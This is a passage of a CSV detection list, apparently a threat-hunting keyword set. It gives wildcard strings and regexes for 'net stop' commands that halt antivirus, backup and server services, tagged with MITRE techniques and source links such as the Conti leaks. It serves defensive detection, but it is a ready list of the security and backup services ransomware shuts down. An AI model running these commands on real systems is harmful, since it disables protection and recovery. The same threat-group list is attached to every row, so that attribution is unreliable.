TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - 
Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop BackupExecAgent*",".{0,1000}net\sstop\sBackupExecAgent.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop badrv*",".{0,1000}net\sstop\sbadrv.{0,1000}","greyware_tool_keyword","net","Wannacry Ransomware & NOODLERAT behavior","T1486 - T1490","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Malware","https://www.virustotal.com/gui/file/cde4ca499282045eecd4fc15ac80a232294556a59b3c8c8a7a593e8333cfd3c7/behavior","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop bedbg /y*",".{0,1000}net\sstop\sbedbg\s\/y.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic 
Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop cbservi*",".{0,1000}net\sstop\scbservi.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop cbvscserv*",".{0,1000}net\sstop\scbvscserv.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense 
Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop DCAgent*",".{0,1000}net\sstop\sDCAgent.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop EhttpSrv*",".{0,1000}net\sstop\sEhttpSrv.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop ekrn*",".{0,1000}net\sstop\sekrn.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - 
GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop EPSecurityService* ",".{0,1000}net\sstop\sEPSecurityService.{0,1000}\s\s\s\s","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop EPUpdateService* ",".{0,1000}net\sstop\sEPUpdateService.{0,1000}\s\s\s\s\s\s\s","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop 
EsgShKernel*",".{0,1000}net\sstop\sEsgShKernel.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop ESHASRV*",".{0,1000}net\sstop\sESHASRV.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop FA_Scheduler*",".{0,1000}net\sstop\sFA_Scheduler.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense 
Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop firebirdguardiandefaultinstance*",".{0,1000}net\sstop\sfirebirdguardiandefaultinstance.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop ibmiasrw*",".{0,1000}net\sstop\sibmiasrw.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop IISADMIN*",".{0,1000}net\sstop\sIISADMIN.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team 
- APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop IISADMIN*",".{0,1000}net\sstop\sIISADMIN.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop IMAP4Svc*",".{0,1000}net\sstop\sIMAP4Svc.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop KAVFS*",".{0,1000}net\sstop\sKAVFS.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - 
Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop KAVFSGT*",".{0,1000}net\sstop\sKAVFSGT.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop kavfsslp*",".{0,1000}net\sstop\skavfsslp.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop klnagent*",".{0,1000}net\sstop\sklnagent.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat 
Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop macmnsvc*",".{0,1000}net\sstop\smacmnsvc.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop masvc*",".{0,1000}net\sstop\smasvc.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop 
MBAMService*",".{0,1000}net\sstop\sMBAMService.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop MBEndpointAgent* ",".{0,1000}net\sstop\sMBEndpointAgent.{0,1000}\s\s\s\s","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop McAfeeEngineService* ",".{0,1000}net\sstop\sMcAfeeEngineService.{0,1000}\s\s\s\s","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE 
BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop McAfeeFramework*",".{0,1000}net\sstop\sMcAfeeFramework.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop McAfeeFrameworkMcAfeeFramework*",".{0,1000}net\sstop\sMcAfeeFrameworkMcAfeeFramework.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop McShield*",".{0,1000}net\sstop\sMcShield.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat 
Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop mfefire*",".{0,1000}net\sstop\smfefire.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop mfemms*",".{0,1000}net\sstop\smfemms.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop 
mfevtp*",".{0,1000}net\sstop\smfevtp.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop mozyprobackup*",".{0,1000}net\sstop\smozyprobackup.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop mr2kserv*",".{0,1000}net\sstop\smr2kserv.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense 
Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop MsDtsServer*",".{0,1000}net\sstop\sMsDtsServer.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop MsDtsServer100*",".{0,1000}net\sstop\sMsDtsServer100.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - 